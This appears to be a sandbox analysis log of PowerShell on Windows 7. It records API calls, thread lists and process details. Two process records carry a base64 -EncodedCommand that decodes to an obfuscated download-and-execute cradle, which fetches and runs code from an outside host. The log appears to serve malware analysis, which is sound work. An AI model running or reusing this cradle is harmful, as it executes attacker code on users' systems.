	[0973.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0973.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0973.145] CoTaskMemAlloc (cb=0x104) returned 0x3304b0
	[0973.145] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3304b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0973.145] CoTaskMemFree (pv=0x3304b0) 
	[0973.148] CoTaskMemAlloc (cb=0x104) returned 0x3304b0
	[0973.148] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3304b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0973.148] CoTaskMemFree (pv=0x3304b0) 
	[0973.149] CoTaskMemAlloc (cb=0x104) returned 0x3304b0
	[0973.149] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3304b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0973.149] CoTaskMemFree (pv=0x3304b0) 
	[0973.151] CoCreateGuid (in: pguid=0x14db28 | out: pguid=0x14db28*(Data1=0x7faceeb0, Data2=0x767c, Data3=0x460e, Data4=([0]=0x84, [1]=0xb0, [2]=0xfa, [3]=0xc1, [4]=0xa6, [5]=0x10, [6]=0xec, [7]=0x4c))) returned 0x0
	[0973.155] CoTaskMemAlloc (cb=0x104) returned 0x3304b0
	[0973.155] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3304b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0973.155] CoTaskMemFree (pv=0x3304b0) 
	[0973.158] CoTaskMemAlloc (cb=0x104) returned 0x3304b0
	[0973.158] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3304b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0973.158] CoTaskMemFree (pv=0x3304b0) 
	[0973.160] CoTaskMemAlloc (cb=0x104) returned 0x3304b0
	[0973.160] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3304b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0973.160] CoTaskMemFree (pv=0x3304b0) 
	[0973.177] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0973.228] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x14d7d0 | out: lpConsoleScreenBufferInfo=0x14d7d0) returned 1
	[0973.244] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0973.245] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x14d7d0 | out: lpConsoleScreenBufferInfo=0x14d7d0) returned 1
	[0973.246] GetVersionExW (in: lpVersionInformation=0x14d760*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14d760*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0973.248] GetCurrentProcess () returned 0xffffffffffffffff
	[0973.249] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x14d7f8 | out: TokenHandle=0x14d7f8*=0x304) returned 1
	[0973.252] GetTokenInformation (in: TokenHandle=0x304, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x14d718 | out: TokenInformation=0x0, ReturnLength=0x14d718) returned 0
	[0973.253] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x337280
	[0973.253] GetTokenInformation (in: TokenHandle=0x304, TokenInformationClass=0x8, TokenInformation=0x337280, TokenInformationLength=0x4, ReturnLength=0x14d718 | out: TokenInformation=0x337280, ReturnLength=0x14d718) returned 1
	[0973.253] DuplicateTokenEx (in: hExistingToken=0x304, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x14d878 | out: phNewToken=0x14d878*=0x300) returned 1
	[0973.253] GetTokenInformation (in: TokenHandle=0x304, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x14d718 | out: TokenInformation=0x0, ReturnLength=0x14d718) returned 0
	[0973.253] GetTokenInformation (in: TokenHandle=0x304, TokenInformationClass=0x8, TokenInformation=0x3372b0, TokenInformationLength=0x4, ReturnLength=0x14d718 | out: TokenInformation=0x3372b0, ReturnLength=0x14d718) returned 1
	[0973.254] CheckTokenMembership (in: TokenHandle=0x300, SidToCheck=0x2f9dab0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x14d888 | out: IsMember=0x14d888) returned 1
	[0973.254] CloseHandle (hObject=0x300) returned 1
	[0973.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0973.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0973.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0973.379] CoTaskMemAlloc (cb=0x804) returned 0x28b92f0
	[0973.379] GetConsoleTitleW (in: lpConsoleTitle=0x28b92f0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0973.380] CoTaskMemFree (pv=0x28b92f0) 
	[0973.407] CoTaskMemAlloc (cb=0x804) returned 0x28baba0
	[0973.408] GetConsoleTitleW (in: lpConsoleTitle=0x28baba0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0973.408] CoTaskMemFree (pv=0x28baba0) 
	[0973.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0973.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0973.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0973.410] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0973.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0973.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0973.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0973.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0973.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0973.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0973.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0973.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0973.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0973.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0973.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0973.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0973.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0973.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0973.906] SetConsoleCtrlHandler (HandlerRoutine=0x2b168dc, Add=1) returned 1
	[0974.190] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x308
	[0974.192] CoCreateGuid (in: pguid=0x14d970 | out: pguid=0x14d970*(Data1=0x3c43b460, Data2=0xfc2, Data3=0x4465, Data4=([0]=0x98, [1]=0xef, [2]=0xa, [3]=0xf2, [4]=0xee, [5]=0x44, [6]=0xdc, [7]=0xdd))) returned 0x0
	[0974.194] CoTaskMemAlloc (cb=0x104) returned 0x3304b0
	[0974.194] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3304b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0974.194] CoTaskMemFree (pv=0x3304b0) 
	[0974.603] WinSqmIsOptedIn () returned 0x0
	[0974.604] CoTaskMemAlloc (cb=0x104) returned 0x3304b0
	[0974.604] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3304b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0974.604] CoTaskMemFree (pv=0x3304b0) 
	[0974.605] CoTaskMemAlloc (cb=0x104) returned 0x3304b0
	[0974.605] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3304b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0974.605] CoTaskMemFree (pv=0x3304b0) 
	[0974.605] CoTaskMemAlloc (cb=0x104) returned 0x3304b0
	[0974.605] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3304b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0974.605] CoTaskMemFree (pv=0x3304b0) 
	[0974.606] CoTaskMemAlloc (cb=0x104) returned 0x3304b0
	[0974.606] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3304b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0974.606] CoTaskMemFree (pv=0x3304b0) 
	[0974.607] CoTaskMemAlloc (cb=0x104) returned 0x3304b0
	[0974.607] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3304b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0974.607] CoTaskMemFree (pv=0x3304b0) 
	[0974.608] CoTaskMemAlloc (cb=0x104) returned 0x3304b0
	[0974.608] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3304b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0974.608] CoTaskMemFree (pv=0x3304b0) 
	[0974.608] CoTaskMemAlloc (cb=0x104) returned 0x3304b0
	[0974.608] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3304b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0974.608] CoTaskMemFree (pv=0x3304b0) 
	[0974.609] CoTaskMemAlloc (cb=0x104) returned 0x3304b0
	[0974.609] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3304b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0974.609] CoTaskMemFree (pv=0x3304b0) 
	[0974.612] CoTaskMemAlloc (cb=0x104) returned 0x3304b0
	[0974.612] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3304b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0974.612] CoTaskMemFree (pv=0x3304b0) 
	[0974.622] CoTaskMemAlloc (cb=0x104) returned 0x3304b0
	[0974.623] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3304b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0974.623] CoTaskMemFree (pv=0x3304b0) 
	[0974.626] CoTaskMemAlloc (cb=0x104) returned 0x3304b0
	[0974.626] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3304b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0974.626] CoTaskMemFree (pv=0x3304b0) 
	[0974.627] CoTaskMemAlloc (cb=0x104) returned 0x3304b0
	[0974.627] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3304b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0974.627] CoTaskMemFree (pv=0x3304b0) 

Thread:
	id = 914
	os_tid = 0x1870


Thread:
	id = 919
	os_tid = 0x1884


Thread:
	id = 1301
	os_tid = 0x1d60


Thread:
	id = 1305
	os_tid = 0x1d7c


Thread:
	id = 1326
	os_tid = 0x1dfc


Thread:
	id = 1391
	os_tid = 0x1f9c


Thread:
	id = 1574
	os_tid = 0x210c


Thread:
	id = 1592
	os_tid = 0x215c

	[0827.929] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0

Thread:
	id = 2142
	os_tid = 0x2478


Process:
	id = "157"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x3a244000"
	os_pid = "0x1564"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 818
	os_tid = 0x10b4

	[0480.148] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 913
	os_tid = 0x186c


Thread:
	id = 918
	os_tid = 0x1880


Thread:
	id = 1317
	os_tid = 0x1dd0


Thread:
	id = 1324
	os_tid = 0x1df0


Thread:
	id = 1562
	os_tid = 0x20bc


Thread:
	id = 1684
	os_tid = 0x2370


Process:
	id = "158"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x3cd51000"
	os_pid = "0x1120"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 831
	os_tid = 0x10ec

	[0480.032] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68
	[0814.539] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0820.049] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0820.051] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0820.051] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0820.051] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0847.380] GetVersionExW (in: lpVersionInformation=0x12dba0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12dba0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0847.383] GetVersionExW (in: lpVersionInformation=0x12dba0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12dba0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0847.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0848.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0848.289] GetVersionExW (in: lpVersionInformation=0x12d910*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12d910*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0848.296] SetErrorMode (uMode=0x1) returned 0x1
